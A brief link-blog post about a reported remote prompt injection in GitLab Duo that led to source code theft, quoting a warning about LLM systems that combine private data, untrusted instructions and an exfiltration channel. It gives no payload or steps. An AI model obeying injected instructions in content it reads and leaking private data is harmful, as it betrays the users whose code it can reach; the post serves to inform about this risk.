Remote Prompt Injection in GitLab Duo Leads to Source Code Theft
Yet another LLM prompt injection/exfiltration attack. "if your LLM system combines access to private data, exposure to malicious instructions and the ability to exfiltrate information (through tool use or through rendering links and images) you have a nasty security hole."
Tags: llms security infosec holes exploits prompt-injection exfiltration gitlab pull-requests